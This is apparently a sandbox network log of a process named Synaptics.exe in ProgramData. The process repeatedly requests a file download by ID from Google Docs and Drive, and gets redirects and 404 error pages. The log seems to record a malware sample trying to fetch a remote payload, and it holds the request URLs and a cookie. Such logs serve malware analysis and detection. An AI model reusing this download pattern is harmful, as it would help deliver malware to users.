                                                                                        2024-12-24 21:11:37 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                        2024-12-24 21:11:37 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 75 35 76 68 6c 63 71 32 50 4f 52 7a 52 4c 44 4a 65 68 70 65 66 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                        Data Ascii: 404 (Not Found)!!1</title><style nonce="u5vhlcq2PORzRLDJehpefQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                        2024-12-24 21:11:37 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                        Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        26192.168.2.449814142.250.181.14437644C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-24 21:11:35 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Cache-Control: no-cache
                                                                                        Host: drive.usercontent.google.com
                                                                                        Connection: Keep-Alive
                                                                                        Cookie: NID=520=UI-98dUkItclliIk2WSXWLZte3xsvWEC6nPvd6glxakMl_ry_mQtvBoTYS_0iqUuYMFT4JdzcRj9TfcFKKD0ibVhP3-cxeYL9qZacytp0c9FK4TTI8dTwF_VVzRIT7_XUD--ljsfmhX5B02tj5rCyqFfLv9hwl7wdf0LpM1eWbF42tCzSDCSRZFR
                                                                                        2024-12-24 21:11:36 UTC1250INHTTP/1.1 404 Not Found
                                                                                        X-GUploader-UploadID: AFiumC7rnA9_S7Qi8GCA-UfTGrN2qot5VI59vv9DVVz-6ifeqn1KLxJhijsbMUdSyxLEDlh-s-OSi1Y
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Tue, 24 Dec 2024 21:11:36 GMT
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-8KwHAnbsuHNwIumLCnEOIw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Content-Length: 1652
                                                                                        Server: UploadServer
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                        Connection: close
                                                                                        2024-12-24 21:11:36 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                        2024-12-24 21:11:36 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 62 76 6c 4c 52 4c 58 43 78 4c 51 47 6f 55 32 42 34 4d 62 69 39 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                        Data Ascii: 404 (Not Found)!!1</title><style nonce="bvlLRLXCxLQGoU2B4Mbi9A">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                        2024-12-24 21:11:36 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                        Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        27192.168.2.449815142.250.181.144437644C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-24 21:11:35 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Host: docs.google.com
                                                                                        Cache-Control: no-cache
                                                                                        2024-12-24 21:11:36 UTC1314INHTTP/1.1 303 See Other
                                                                                        Content-Type: application/binary
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Tue, 24 Dec 2024 21:11:36 GMT
                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-SMg5fs16xs10qJZ1RKUuxw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Server: ESF
                                                                                        Content-Length: 0
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        28192.168.2.449823142.250.181.144437644C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-24 21:11:38 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Host: docs.google.com
                                                                                        Cache-Control: no-cache
                                                                                        2024-12-24 21:11:39 UTC1314INHTTP/1.1 303 See Other
                                                                                        Content-Type: application/binary
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Tue, 24 Dec 2024 21:11:39 GMT
                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-XjSviuluHwAmy4CU49_Lyw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Server: ESF
                                                                                        Content-Length: 0
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        29192.168.2.449822142.250.181.144437644C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-24 21:11:38 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Host: docs.google.com
                                                                                        Cache-Control: no-cache
                                                                                        2024-12-24 21:11:39 UTC1314INHTTP/1.1 303 See Other
                                                                                        Content-Type: application/binary
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Tue, 24 Dec 2024 21:11:39 GMT
                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-0ASf4NP1IAJDV002cd-eLQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Server: ESF
                                                                                        Content-Length: 0
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        30192.168.2.449828142.250.181.14437644C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-24 21:11:41 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Cache-Control: no-cache
                                                                                        Host: drive.usercontent.google.com
                                                                                        Connection: Keep-Alive
                                                                                        Cookie: NID=520=UI-98dUkItclliIk2WSXWLZte3xsvWEC6nPvd6glxakMl_ry_mQtvBoTYS_0iqUuYMFT4JdzcRj9TfcFKKD0ibVhP3-cxeYL9qZacytp0c9FK4TTI8dTwF_VVzRIT7_XUD--ljsfmhX5B02tj5rCyqFfLv9hwl7wdf0LpM1eWbF42tCzSDCSRZFR
                                                                                        2024-12-24 21:11:42 UTC1250INHTTP/1.1 404 Not Found
                                                                                        X-GUploader-UploadID: AFiumC7WA2Y8YS4sq2SX7PKcmRLUFFUwmOfe-iVK2TqvHNzPYGCEVdCfiNZEhdaIlmmmOwqoMp9PPFU
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Tue, 24 Dec 2024 21:11:41 GMT
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-H0xkIP8YlI84o1Uzra5R1w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Content-Length: 1652
                                                                                        Server: UploadServer
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                        Connection: close
                                                                                        2024-12-24 21:11:42 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                        2024-12-24 21:11:42 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 5f 50 42 7a 31 38 41 72 64 47 6b 6f 49 31 36 4c 57 7a 5f 38 75 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                        Data Ascii: 404 (Not Found)!!1</title><style nonce="_PBz18ArdGkoI16LWz_8uw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                        2024-12-24 21:11:42 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                        Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        31192.168.2.449827142.250.181.144437644C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-24 21:11:41 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Host: docs.google.com
                                                                                        Cache-Control: no-cache
                                                                                        2024-12-24 21:11:42 UTC1314INHTTP/1.1 303 See Other
                                                                                        Content-Type: application/binary
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Tue, 24 Dec 2024 21:11:42 GMT
                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-1BneYV-k4RE8pyG5YrG_EQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Server: ESF
                                                                                        Content-Length: 0
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        32192.168.2.449829142.250.181.144437644C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-24 21:11:41 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Host: docs.google.com
                                                                                        Cache-Control: no-cache
                                                                                        2024-12-24 21:11:42 UTC1314INHTTP/1.1 303 See Other
                                                                                        Content-Type: application/binary
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Tue, 24 Dec 2024 21:11:42 GMT
                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-M1WvmV5tFHu0LBkenv_Bsw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Server: ESF
                                                                                        Content-Length: 0
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        33192.168.2.449830142.250.181.14437644C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-24 21:11:41 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Cache-Control: no-cache
                                                                                        Host: drive.usercontent.google.com
                                                                                        Connection: Keep-Alive
                                                                                        Cookie: NID=520=UI-98dUkItclliIk2WSXWLZte3xsvWEC6nPvd6glxakMl_ry_mQtvBoTYS_0iqUuYMFT4JdzcRj9TfcFKKD0ibVhP3-cxeYL9qZacytp0c9FK4TTI8dTwF_VVzRIT7_XUD--ljsfmhX5B02tj5rCyqFfLv9hwl7wdf0LpM1eWbF42tCzSDCSRZFR
                                                                                        2024-12-24 21:11:42 UTC1250INHTTP/1.1 404 Not Found
                                                                                        X-GUploader-UploadID: AFiumC5ZRiUz5NVF2mP0u_ZVsZDEBOnXQC28AKyFRCynzL__a8CMZvu9nhsbEgCFBgc84JFIw5w_XAo
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Tue, 24 Dec 2024 21:11:42 GMT
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-vjgl7Th5SEbiqZaYJKFzYQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Content-Length: 1652
                                                                                        Server: UploadServer
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                        Connection: close
                                                                                        2024-12-24 21:11:42 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
